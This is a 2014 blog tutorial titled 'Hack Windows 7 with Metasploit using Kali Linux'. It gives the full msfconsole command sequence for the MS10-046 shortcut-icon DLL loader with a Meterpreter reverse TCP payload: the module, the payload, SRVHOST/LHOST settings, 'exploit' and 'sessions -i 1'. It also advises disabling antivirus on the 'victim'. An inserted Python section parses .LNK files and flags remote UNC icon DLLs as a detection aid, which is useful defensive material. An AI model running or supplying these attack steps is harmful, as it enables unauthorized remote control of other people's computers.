Friday, 22 August 2014

Hack Windows 7 with Metasploit using Kali Linux



Exploiting a Windows vulnerability with Metasploit to get into the system without a username or password.

Requirements:
1. Metasploit installed (Kali Linux distribution)
2. Ruby installed (install all the Ruby packages to avoid any issues)
3. Two operating systems, running either as virtual machines on the same host or on physically separate machines

Machine 1: Host, Kali Linux machine
Machine 2: Target, Windows 7 machine (32 bit).

To launch Metasploit, enter msfconsole at the command line:
#msfconsole



Once you get the msf prompt, search the module list for exploit/windows/browser/ms10_046_shortcut_icon_dllloader.

This module exploits a vulnerability in the handling of Windows shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. The module creates a WebDAV service that can be used to run an arbitrary payload when the share is accessed as a UNC path.
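On the defending side, the shortcut files this module serves have a recognisable shape: the IconLocation string of the .LNK points at a .dll or .cpl on a remote UNC (WebDAV) path instead of a local file. The following is an added example, not part of this post and not Metasploit's code: a small Python parser for the Shell Link header and StringData section (per the MS-SHLLINK layout) that extracts IconLocation and flags such shortcuts. The build_lnk helper exists only to construct the two sample shortcuts inline; the share path \\192.0.2.10\webdav\icon.dll is a constructed value on a documentation address, not a real host.

```python
import struct

# Shell Link (.LNK) header constants from the MS-SHLLINK layout
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that decide which optional sections precede StringData
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order, each present only if its flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Return the LinkFlags and StringData strings of a .LNK file.

    LinkTargetIDList and LinkInfo are skipped using their own size fields;
    ExtraData after the strings is ignored.
    """
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]   # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]       # LinkInfoSize covers the whole block
    unicode = bool(flags & IS_UNICODE)
    result = {"flags": flags}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]      # CountCharacters, no terminator
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated StringData field {name}")
        off += nbytes
        result[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return result


def icon_is_suspicious(icon_location: str) -> bool:
    """MS10-046 shape: the icon resource is a library (.dll/.cpl) on a remote UNC/WebDAV path."""
    low = icon_location.strip().lower()
    remote = low.startswith("\\\\")
    library = low.endswith((".dll", ".cpl"))
    return remote and library


def scan_lnk(data: bytes) -> dict:
    """Parse one shortcut and attach a verdict under the 'suspicious' key."""
    info = parse_lnk(data)
    info["suspicious"] = icon_is_suspicious(info.get("icon_location", ""))
    return info


def build_lnk(icon_location: str) -> bytes:
    """Build a minimal .LNK carrying only an IconLocation string (used here to construct test input)."""
    flags = HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        LNK_HEADER_SIZE, LNK_CLSID, flags,
        0,           # FileAttributes
        0, 0, 0,     # CreationTime, AccessTime, WriteTime
        0,           # FileSize
        0,           # IconIndex
        1,           # ShowCommand: SW_SHOWNORMAL
        0, 0, 0, 0,  # HotKey, Reserved1, Reserved2, Reserved3
    )
    return header + struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")


# Constructed samples: an ordinary local icon, and one shaped like a WebDAV-served shortcut
BENIGN_LNK = build_lnk(r"C:\Windows\System32\shell32.dll")
SUSPICIOUS_LNK = build_lnk(r"\\192.0.2.10\webdav\icon.dll")  # constructed, documentation address

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("suspicious", SUSPICIOUS_LNK)):
        verdict = scan_lnk(blob)
        print(f"{label}: icon={verdict.get('icon_location')!r} suspicious={verdict['suspicious']}")
```

To use it on real files, read each .lnk from a share or mail attachment store as bytes and pass it to scan_lnk; a local icon path in a .dll (as most shortcuts have) is not flagged, only a library reached over a UNC path is.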

Once we have found the desired module we will select it by typing the command below:
#msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

  
Once loaded, your msf prompt should include the name of the loaded exploit.
Now that the exploit is loaded we will set the payload for it. In our scenario we will be using a reverse TCP payload. Type the command below to set the payload:

#msf > set payload windows/meterpreter/reverse_tcp


 
Now it's time to do some configuration for the exploit/payload that we have just set. Type the given command:
#msf > show options
 

You should get the module's default options as output.

Now we have to set the local host to listen on. Type the two commands given below.

#msf > set SRVHOST 192.168.73.128
This is the IP address of your host running Metasploit.

 #msf > set LHOST 192.168.73.128
This is also the IP address of your host running Metasploit.




Now check that the above configuration has been applied.
#msf > show options



Now finally we will start the exploit. Run the exploit command.
#msf > exploit


Once executed we should see “Server started” (make sure your host is not already running a web service on port 80).
On any client machine simply open Internet Explorer and try to open http://192.168.73.128:80/


Note: it will give you a pop-up asking for permission; click ALLOW, and make sure you do not have any antivirus running on the target PC.
You can check the number of successfully connected sessions by running the command sessions in the msf console.
Now that we can see one victim connected, it is time to get onto the system. Run the command sessions -i 1.

#msf > sessions -i 1

Now you are connected to the remote system and can run a lot of scripts in Meterpreter. To learn how to use the scripts, check out the "help" command in Meterpreter.


Enjoy yourself :)
 

3 comments:

  1. Sir,
    What is the process to install Kali Linux on my laptop with Windows 8.1?
  2. We will be getting a reverse TCP connection from the victim machine by using a small backdoor using Metasploit on Windows.